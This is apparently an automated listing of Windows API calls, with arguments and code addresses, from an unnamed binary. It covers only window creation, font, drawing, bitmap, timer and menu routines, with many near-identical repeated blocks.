CreateFontIndirectA.GDI32(0044AEE8), ref: 0040B63E
SelectObject.GDI32(0044A655,00000000), ref: 0040B648
SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0040B654
SetTextColor.GDI32(0044A655,?), ref: 0040B662
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6D7
LineTo.GDI32(0044A654,B8003FFD,0044A652), ref: 0040B6EA
MoveToEx.GDI32(0044A654,B8004000,0044A652,00000000), ref: 0040B6F5
LineTo.GDI32(0044A654,B8004000,0044A555), ref: 0040B701
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B712
LineTo.GDI32(0044A654,?,?), ref: 0040B727
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040B738
LineTo.GDI32(0044A654,B8004000,?), ref: 0040B74B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040B7A2
LoadCursorA.USER32(00000000,00007F02), ref: 0040B7B6
LoadIconA.USER32(00000000,00007F02), ref: 0040B7CA
GetModuleHandleA.KERNEL32(00000000,?,00000030,00000000,00000001), ref: 0040B7E7
LoadIconA.USER32(00000000), ref: 0040B7F6
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040B838
GetClientRect.USER32(00000000,?), ref: 0040B849
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040B870
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040B899
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040B8A6
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040B8B5
GetModuleHandleA.KERNEL32(00000000,?,?,00000030,00000000,00000001), ref: 0040B8BD
LoadBitmapA.USER32(00000000,00000000), ref: 0040B8CF
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040B8E7
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040B8FF
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040B99B
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040B9B4
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040B9C5
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040B9D8
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9E3
LineTo.GDI32(0044A654,?,00000770), ref: 0040B9F2
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040B9FD
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040BA09
CreateFontIndirectA.GDI32(0044AF28), ref: 0040BA9E
SelectObject.GDI32(0044A655,00000000), ref: 0040BAA8
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040BAB4
SetTextColor.GDI32(0044A655,?), ref: 0040BAC2
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BB9C
LineTo.GDI32(0044A654,B8003FFD,?), ref: 0040BBB5
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBC6
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BBD9
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBE4
LineTo.GDI32(0044A654,?,?), ref: 0040BBF3
MoveToEx.GDI32(0044A654,B8004000,?,00000000), ref: 0040BBFE
LineTo.GDI32(0044A654,B8004000,?), ref: 0040BC0A
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BC48
LoadCursorA.USER32(00000000,00007F02), ref: 0040BC5C
LoadIconA.USER32(00000000,00007F02), ref: 0040BC70
GetModuleHandleA.KERNEL32(00000000), ref: 0040BC8D
LoadIconA.USER32(00000000), ref: 0040BC9C
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BCDE
GetClientRect.USER32(00000000,?), ref: 0040BCEF
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BD16
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BD3F
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BD4C
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BD5B
GetModuleHandleA.KERNEL32(00000000), ref: 0040BD63
LoadBitmapA.USER32(00000000), ref: 0040BD75
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BD8D
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BDA5
CreateSolidBrush.GDI32(0014C8C8), ref: 0040BE3E
LoadCursorA.USER32(00000000,00007F02), ref: 0040BE52
LoadIconA.USER32(00000000,00007F02), ref: 0040BE66
GetModuleHandleA.KERNEL32(00000000), ref: 0040BE83
LoadIconA.USER32(00000000), ref: 0040BE92
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040BED2
GetClientRect.USER32(00000000,?), ref: 0040BEE3
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040BF0A
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040BF33
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040BF40
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040BF4F
GetModuleHandleA.KERNEL32(00000000), ref: 0040BF57
LoadBitmapA.USER32(00000000), ref: 0040BF69
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040BF81
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040BF99
CreateFontIndirectA.GDI32(0044AF68), ref: 0040C02E
SelectObject.GDI32(0044A655,00000000), ref: 0040C03D
SendMessageA.USER32(0044A660,00000030,?,00000001), ref: 0040C050
SetTextColor.GDI32(0044A655,?), ref: 0040C05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C0B0
GetClientRect.USER32(0044A660,?), ref: 0040C0C1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C0E7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C0F2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C149
LoadCursorA.USER32(00000000,00007F02), ref: 0040C15D
LoadIconA.USER32(00000000,00007F02), ref: 0040C171
GetModuleHandleA.KERNEL32(00000000), ref: 0040C18E
LoadIconA.USER32(00000000), ref: 0040C19D
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C1DF
GetClientRect.USER32(00000000,?), ref: 0040C1F0
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C217
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C240
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C24D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C25C
GetModuleHandleA.KERNEL32(00000000), ref: 0040C264
LoadBitmapA.USER32(00000000,00000000), ref: 0040C276
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C28E
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C2A6
CreateFontIndirectA.GDI32(0044AFA8), ref: 0040C361
SelectObject.GDI32(0044A655,00000000), ref: 0040C36B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C377
SetTextColor.GDI32(0044A655,?), ref: 0040C385
CreateFontIndirectA.GDI32(0044AFE8), ref: 0040C441
SelectObject.GDI32(0044A655,00000000), ref: 0040C44B
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C457
SetTextColor.GDI32(0044A655,?), ref: 0040C465
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C507
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040C51A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C525
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040C531
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C542
LineTo.GDI32(0044A654,?,?), ref: 0040C557
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C568
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C57B
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C5B7
GetClientRect.USER32(0044A660,?), ref: 0040C5C8
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C5EE
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C5F9
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040C674
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040C68D
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040C69E
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040C6B1
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6BC
LineTo.GDI32(0044A654,?,0044A658), ref: 0040C6CB
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040C6D6
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040C6E2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040C720
LoadCursorA.USER32(00000000,00007F02), ref: 0040C734
LoadIconA.USER32(00000000,00007F02), ref: 0040C748
GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
LoadIconA.USER32(00000000), ref: 0040C774
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
GetClientRect.USER32(00000000,?), ref: 0040C7C7
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
LoadBitmapA.USER32(00000000), ref: 0040C84D
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
GetClientRect.USER32(0044A660,?), ref: 0040C8E1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
GetClientRect.USER32(0044A660,?), ref: 0040CA25
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
LoadIconA.USER32(00000000), ref: 0040CBA1
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
GetClientRect.USER32(00000000,?), ref: 0040CBF4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
LoadBitmapA.USER32(00000000), ref: 0040CC7A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
SetTextColor.GDI32(0044A655,?), ref: 0040CD63
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
GetClientRect.USER32(0044A660,?), ref: 0040CE92
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
SelectObject.GDI32(0044A655,00000000), ref: 0040D044
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
SetTextColor.GDI32(0044A655,?), ref: 0040D05E
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
GetClientRect.USER32(0044A660,?), ref: 0040D0B7
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
SelectObject.GDI32(0044A655,00000000), ref: 0040D269
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
SetTextColor.GDI32(0044A655,?), ref: 0040D283
CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
SetTextColor.GDI32(0044A655,?), ref: 0040D349
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
LoadIconA.USER32(00000000,00007F02), ref: 0040D491
GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
LoadIconA.USER32(00000000), ref: 0040D4BD
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
GetClientRect.USER32(00000000,?), ref: 0040D510
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
LoadBitmapA.USER32(00000000), ref: 0040D596
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
GetClientRect.USER32(0044A660,?), ref: 0040D69C
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
SetTextColor.GDI32(0044A655,?), ref: 0040D786
CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
LoadIconA.USER32(00000000,00007F02), ref: 0040D835
GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
LoadIconA.USER32(00000000), ref: 0040D861
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
GetClientRect.USER32(00000000,?), ref: 0040D8B4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
LoadBitmapA.USER32(00000000), ref: 0040D93A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
GetClientRect.USER32(0044A660,?), ref: 0040D9CE
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
LoadIconA.USER32(00000000), ref: 0040DB57
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
GetClientRect.USER32(00000000,?), ref: 0040DBAA
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
LoadBitmapA.USER32(00000000), ref: 0040DC30
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
GetClientRect.USER32(0044A660,?), ref: 0040DDA1
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
LoadIconA.USER32(00000000), ref: 0040DE71
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
GetClientRect.USER32(00000000,?), ref: 0040DEC4
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
LoadBitmapA.USER32(00000000), ref: 0040DF4A
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
LineTo.GDI32(0044A654,?,?), ref: 0040E05E
MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
LoadIconA.USER32(00000000), ref: 0040E114
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
GetClientRect.USER32(00000000,?), ref: 0040E167
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
LoadBitmapA.USER32(00000000), ref: 0040E1F4
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
GetClientRect.USER32(0044A660,?), ref: 0040E363
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
SelectObject.GDI32(0044A655,00000000), ref: 0040E447
SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
SetTextColor.GDI32(0044A655,?), ref: 0040E461
GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
GetClientRect.USER32(0044A660,?), ref: 0040E502
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
LoadIconA.USER32(00000000), ref: 0040E606
CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
GetClientRect.USER32(00000000,?), ref: 0040E657
CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
SHGetMalloc.SHELL32(?), ref: 0040E817
SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
KillTimer.USER32(00000000,00000000), ref: 0040EB99
BeginPaint.USER32(0044A660,?), ref: 0040EBAE
